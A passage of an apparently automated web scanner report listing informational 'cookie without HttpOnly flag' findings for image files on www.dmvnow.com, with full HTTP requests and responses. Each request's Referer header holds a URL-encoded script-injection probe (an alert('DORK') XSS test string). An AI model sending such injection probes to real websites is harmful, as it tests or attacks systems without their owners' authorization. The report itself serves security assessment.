The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/geninfo_on.gif HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:11:55 GMT
Content-Type: image/gif
Accept-Ranges: bytes
Last-Modified: Wed, 20 Jun 2001 12:33:18 GMT
ETag: "0bbf22e85f9c01:7c8"
Content-Length: 624

GIF89a..........f.....nnS77)..p..
..|...''....{{\DD3..f^^GRR=....oS..m.......................................!.......,........... .di.h..l..p,.tm.x....,...6 ..C.A@B...........C.`...%. ..P...cP.CrB.p
...[SNIP]...

7.182. http://www.dmvnow.com/images/go_ball.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/go_ball.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/go_ball.gif HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:12:17 GMT
Content-Type: image/gif
Accept-Ranges: bytes
Last-Modified: Mon, 09 Jul 2007 18:11:00 GMT
ETag: "012f68054c2c71:7c8"
Content-Length: 396

GIF89a.........g..<.uK..W..I...xY'.....]lQ'.t3eJ!]E..a/...n1.....?..................iN"...bH .y6.~8....i/...!.......,............'.]F...P...':.D..@.~. ..[....z?.-0.l8FQ.......F!..().u..*....#.T
....)
...[SNIP]...

7.183. http://www.dmvnow.com/images/icon_email.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/icon_email.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icon_email.gif HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:11:55 GMT
Content-Type: image/gif
Accept-Ranges: bytes
Last-Modified: Fri, 06 Jul 2007 17:31:00 GMT
ETag: "0e2356bf3bfc71:7c8"
Content-Length: 513

GIF89ag......@g..........Pt...........Ajp.....`..0[~ Nt....._...................4`...........................!.......,....g.......%.di.h..l..p,.tm..+HS..>InHL &)..!....cr.$...+.P...$)..$.(.t..@\,k....
...[SNIP]...

7.184. http://www.dmvnow.com/images/icon_printergif.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/icon_printergif.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icon_printergif.gif HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:11:55 GMT
Content-Type: image/gif
Accept-Ranges: bytes
Last-Modified: Fri, 06 Jul 2007 17:31:00 GMT
ETag: "0e2356bf3bfc71:7c8"
Content-Length: 573

GIF89ag.........'Txe....v.....lhZ=..............[.xQ.....~.............._..f.............Aj....4`@g..........!.......,....g.......'.di.h..l..p,..X.x...E.. ..rP. .r.B0...t.e8....CQL
..cL&.".....li.....
...[SNIP]...

7.185. http://www.dmvnow.com/images/moving_on.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/moving_on.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/moving_on.gif HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:11:55 GMT
Content-Type: image/gif
Accept-Ranges: bytes
Last-Modified: Tue, 02 Jul 2002 12:02:22 GMT
ETag: "05b6b52c021c21:7c8"
Content-Length: 406

GIF89a..........f.....onS..q**.HH6...nnS...''......
..f...RR=..|..p77).......................................!.......,........... .di.h..l..p,.tm.x....8..PG..F.C..j,..FbH...... ..X./.!E,"..........@.
...[SNIP]...

7.186. http://www.dmvnow.com/images/officelocations_off.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/officelocations_off.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/officelocations_off.gif HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:11:55 GMT
Content-Type: image/gif
Accept-Ranges: bytes
Last-Modified: Wed, 20 Jun 2001 12:33:54 GMT
ETag: "0e5674485f9c01:7c8"
Content-Length: 560

GIF89ad.................|..p..f.z\.nR.gM.^F.Q=.D3.6)y&.s..l
................................................!.......,....d...@.. $.di.h..l.......@......$...P<H....X.t.. ...f...Q#l!.j..rT...`.s.!.+.:
...[SNIP]...

7.187. http://www.dmvnow.com/images/officelocations_on.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/officelocations_on.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/officelocations_on.gif HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:11:55 GMT
Content-Type: image/gif
Accept-Ranges: bytes
Last-Modified: Wed, 20 Jun 2001 12:33:54 GMT
ETag: "0e5674485f9c01:7c8"
Content-Length: 552

GIF89ad.......................|..p..f.{\.nS.eL.^G.R=.D3.7)z'.s..m.
f.........................................,....d...@... .di.h..l....... ....d.$ ..@.H..H"Y.t..$...f...Qsl..j.."T.....#....+.:i..c}.7.
...[SNIP]...

7.188. http://www.dmvnow.com/images/online_on.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/online_on.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/online_on.gif HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:11:55 GMT
Content-Type: image/gif
Accept-Ranges: bytes
Last-Modified: Mon, 11 Feb 2002 17:45:20 GMT
ETag: "0389edf23b3c11:7c8"
Content-Length: 448

GIF89a.............nnS..qJJ7f..77)##.!.......,...............0.I..8....`...h..).D .. dB].....c..B`..........s...Gm....b`S........ed....o...{v%.]...'.j.aCuBvF.CLj.LIzF?.?uf.W.2CCfK.\.L.B..Zu...u.K.~.?.
...[SNIP]...

7.189. http://www.dmvnow.com/images/peak2000.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/peak2000.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/peak2000.jpg HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:12:17 GMT
Content-Type: image/jpeg
Accept-Ranges: bytes
Last-Modified: Fri, 13 Jul 2007 17:56:18 GMT
ETag: "08de61c77c5c71:7c8"
Content-Length: 5901

......JFIF.....d.d......Ducky.......U......Adobe.d...........................................................

.....................
...
............................................................
...[SNIP]...

7.190. http://www.dmvnow.com/images/resources_on.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/resources_on.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/resources_on.gif HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:11:55 GMT
Content-Type: image/gif
Accept-Ranges: bytes
Last-Modified: Wed, 20 Jun 2001 12:34:52 GMT
ETag: "0fef96685f9c01:7c8"
Content-Length: 465

GIF89a..........f.....nnS77).....
.....p..|^^G''.RR=DD3{{\.....f.............................................!.......,........... .di.h..l..p,.tm.x..|...... ....r.........Zy..`!@..........$...$...v].
...[SNIP]...

7.191. http://www.dmvnow.com/images/se.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/se.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/se.gif HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:12:17 GMT
Content-Type: image/gif
Accept-Ranges: bytes
Last-Modified: Fri, 16 Feb 2007 17:48:00 GMT
ETag: "0885899f251c71:7c8"
Content-Length: 266

GIF89a(.(....&F_4RjC_tQk`w.n..}.............................!..http://wigflip.com/cornershop/.!.......,....(.(......I..8.....'b.hR..*...f....9..)...=.F..^.....T.'I.3.}Z.U....>.].!..6.e..-.....;m...0.
...[SNIP]...

7.192. http://www.dmvnow.com/images/sitemap_off.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/sitemap_off.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/sitemap_off.gif HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:11:55 GMT
Content-Type: image/gif
Accept-Ranges: bytes
Last-Modified: Wed, 20 Jun 2001 12:35:16 GMT
ETag: "01a487585f9c01:7c8"
Content-Length: 356

GIF89ad.................|..p..f.z\.nR.^F.Q=.D3.6)y&.s..l
...!.......,....d...@....I..8.......@2"..,.P JE.c..(C..~>..hH|.v.....pv.%.W.Z1.E..`H..!x.......aJ,W FX"....F3.(SU@.
..2=.L=(....>..#.x.5
.%?$^
...[SNIP]...

7.193. http://www.dmvnow.com/images/sitemap_on.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/sitemap_on.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/sitemap_on.gif HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:11:55 GMT
Content-Type: image/gif
Accept-Ranges: bytes
Last-Modified: Wed, 20 Jun 2001 12:35:16 GMT
ETag: "01a487585f9c01:7c8"
Content-Length: 404

GIF89ad.......................|..p..f.{\.nS.^G.R=.D3.7)z'.s..m.
f............................................,....d...@... .di.h..l....D.2'.-...$.R.1..".B#.@..K.lJ.<...@.....-.Y-.Q...T(...)...)...j`Cl
...[SNIP]...

7.194. http://www.dmvnow.com/images/sw.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/sw.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/sw.gif HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:12:17 GMT
Content-Type: image/gif
Accept-Ranges: bytes
Last-Modified: Fri, 16 Feb 2007 17:48:00 GMT
ETag: "0885899f251c71:7c8"
Content-Length: 267

GIF89a(.(....................................................!..http://wigflip.com/cornershop/.!.......,....(.(......I..8.... ..$..(..,.....r |5..y..=. ...N.......M.1..<....@.J.X.c.8...Q.M[..U.q....v@
...[SNIP]...

7.195. http://www.dmvnow.com/images/tanline.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/tanline.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/tanline.jpg HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:12:17 GMT
Content-Type: image/jpeg
Accept-Ranges: bytes
Last-Modified: Fri, 16 Feb 2007 17:48:00 GMT
ETag: "0885899f251c71:7c8"
Content-Length: 792

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222
...[SNIP]...

7.196. http://www.dmvnow.com/images/virginia_dot_gov_logo.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/virginia_dot_gov_logo.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/virginia_dot_gov_logo.jpg HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:11:55 GMT
Content-Type: image/jpeg
Accept-Ranges: bytes
Last-Modified: Fri, 01 Jun 2007 12:40:00 GMT
ETag: "010c8f749a4c71:7c8"
Content-Length: 6083

......JFIF.....`.`.....fExif..II*...............>...........F...(...........1.......N.......`.......`.......Paint.NET v3.0.....C....................................................................C...
...[SNIP]...

7.197. http://www.dmvnow.com/images/virginia_seach_button-bg.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/virginia_seach_button-bg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/virginia_seach_button-bg.jpg HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:12:17 GMT
Content-Type: image/jpeg
Accept-Ranges: bytes
Last-Modified: Fri, 01 Jun 2007 12:50:50 GMT
ETag: "031367b4ba4c71:7c8"
Content-Length: 1007

......JFIF.....d.d......Ducky.......P.....&Adobe.d...........
...........j....................................................

...................... .. . .....................................
...[SNIP]...

7.198. http://www.dmvnow.com/images/virginia_seach_txt-bg.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/virginia_seach_txt-bg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/virginia_seach_txt-bg.jpg HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
